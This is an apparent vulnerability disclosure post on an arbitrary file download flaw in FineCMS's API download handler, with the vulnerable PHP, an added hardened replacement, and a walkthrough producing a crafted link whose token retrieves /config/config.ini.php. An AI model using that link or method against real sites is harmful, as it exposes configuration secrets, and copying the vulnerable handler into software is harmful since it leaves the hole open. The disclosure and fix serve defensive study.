Finecms arbitrary file download vulnerability
- Published in
- Vulndb
Author: Sinner
Vulnerable file:
\controllers\ApiController.php Line 54
```php
public function downAction()
{
    $data = fn_authcode(base64_decode($this->get('file')), 'DECODE');
    $file = isset($data['finecms']) && $data['finecms'] ? $data['finecms'] : '';
    if (empty($file)) {
        $this->msg(lang('a-mod-213'));
    }
    if (strpos($file, ':/')) {
        // remote
        header("Location: $file");
    } else {
        // local
        $file = str_replace('..', '', $file);
        $file = strpos($file, '/') === 0 ? APP_ROOT.$file : $file;
        if (!is_file($file)) {
            $this->msg(lang('a-mod-214') . '(#' . $file . ')');
        };
        header('Pragma: public');
        header('Last-Modified: ' . gmdate('D, d M Y H:i:s') . ' GMT');
        header('Cache-Control: no-store, no-cache, must-revalidate');
        header('Cache-Control: pre-check=0, post-check=0, max-age=0');
        header('Content-Transfer-Encoding: binary');
        header('Content-Encoding: none');
        header('Content-type: ' . strtolower(trim(substr(strrchr($file, '.'), 1, 10))));
        header('Content-Disposition: attachment; filename="' . basename($file) . '"');
        header('Content-length: ' . sprintf("%u", filesize($file)));
        readfile($file);
        exit;
    }
}
```
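The handler above accepts whatever path the decoded token carries: the fn_authcode() token only proves the link was produced with the site's key, it does not restrict which file may be served, and stripping `..` from a string is not a canonicalisation. The following is an added example of a hardened local-file branch, not FineCMS code; `resolveDownloadPath()`, `sendDownload()`, `serveDecodedPath()`, `$downloadRoot` and the extension-to-MIME list are assumptions made for the example, and `fn_authcode()`, `lang()` and `APP_ROOT` are taken to behave as in the original controller.

```php
<?php
// Added example (not FineCMS code): confine downloads to one directory and
// serve only known file types. All names below are assumptions.

/**
 * Resolve a requested file against a fixed download directory.
 * Returns the canonical absolute path, or null when the request does not
 * name a regular file inside that directory.
 */
function resolveDownloadPath(string $requested, string $downloadRoot): ?string
{
    $root = realpath($downloadRoot);
    if ($root === false || !is_dir($root)) {
        return null;
    }
    // Refuse anything that looks like a URL; this branch never redirects.
    if (strpos($requested, '://') !== false) {
        return null;
    }
    // Let the OS canonicalise ".", ".." and symlinks instead of editing the
    // string; realpath() returns false for non-existent paths.
    $candidate = realpath($root . DIRECTORY_SEPARATOR . ltrim($requested, '/\\'));
    if ($candidate === false || !is_file($candidate)) {
        return null;
    }
    // Require a separator after the root so a sibling directory whose name
    // merely starts with the root name is not accepted.
    $prefix = rtrim($root, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $candidate;
}

/** File types this endpoint is willing to serve, each with a fixed MIME type. */
const ALLOWED_DOWNLOAD_TYPES = [
    'pdf' => 'application/pdf',
    'zip' => 'application/zip',
    'jpg' => 'image/jpeg',
    'png' => 'image/png',
];

/** Send a file that has already been validated by resolveDownloadPath(). */
function sendDownload(string $path): void
{
    $ext = strtolower(pathinfo($path, PATHINFO_EXTENSION));
    if (!isset(ALLOWED_DOWNLOAD_TYPES[$ext])) {
        http_response_code(403);
        exit;
    }
    header('Content-Type: ' . ALLOWED_DOWNLOAD_TYPES[$ext]);
    header('X-Content-Type-Options: nosniff');
    header('Cache-Control: no-store, no-cache, must-revalidate');
    header('Content-Disposition: attachment; filename="' . basename($path) . '"');
    header('Content-Length: ' . filesize($path));
    readfile($path);
    exit;
}

/**
 * Replacement for the body of downAction(): decode the token as before, then
 * treat the result as a name relative to APP_ROOT/uploads (assumed location)
 * rather than as an arbitrary path.
 */
function serveDecodedPath(string $token): void
{
    $data = fn_authcode(base64_decode($token), 'DECODE');
    $requested = isset($data['finecms']) && $data['finecms'] ? $data['finecms'] : '';
    $downloadRoot = APP_ROOT . '/uploads';

    $path = resolveDownloadPath($requested, $downloadRoot);
    if ($path === null) {
        // Do not echo the requested path back in the error message.
        http_response_code(404);
        exit(lang('a-mod-214'));
    }
    sendDownload($path);
}
```

The two checks are independent: `resolveDownloadPath()` rejects any request whose canonical target lies outside the download directory, and `sendDownload()` refuses to emit a file whose type is not on the list even when it sits inside that directory, so a configuration or PHP file placed there by mistake is still not downloadable.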
`$file` is under the caller's control. There is no need to analyse how it is encrypted; instead, look at how the link is generated.
See /extensions/function.php Line 285:
```php
function downfile($url)
{
    return url('api/down', array('file' => str_replace('=', '', base64_encode(fn_authcode(array('finecms' => $url), 'ENCODE')))));
}
```
The `$url` parameter is the file path.
Calling this function locally with the path of the file we want to download as its argument yields the download link:
```
http://127.0.0.1//index.php?c=api&a=down&file=NDgwNTA0M2RFRXRkc1ZTaGNuczJBSjZTSk9KSDVTYnFqL251K0lNRjBQK0tla0FBTVpHM3dLbU8yVTNWaE1SYTRtRXRjUlQ3bDd4cGRQeVRKMGVlcDEvQjNRVlA4bTNnMi9SZDRDSjBOUQ
```
The `file` value in this link corresponds to /config/config.ini.php:
```
NDgwNTA0M2RFRXRkc1ZTaGNuczJBSjZTSk9KSDVTYnFqL251K0lNRjBQK0tla0FBTVpHM3dLbU8yVTNWaE1SYTRtRXRjUlQ3bDd4cGRQeVRKMGVlcDEvQjNRVlA4bTNnMi9SZDRDSjBOUQ
```
Original article: Finecms arbitrary file download vulnerability
All media may reproduce this article provided the author attribution and the original link are preserved; otherwise our content may not be used.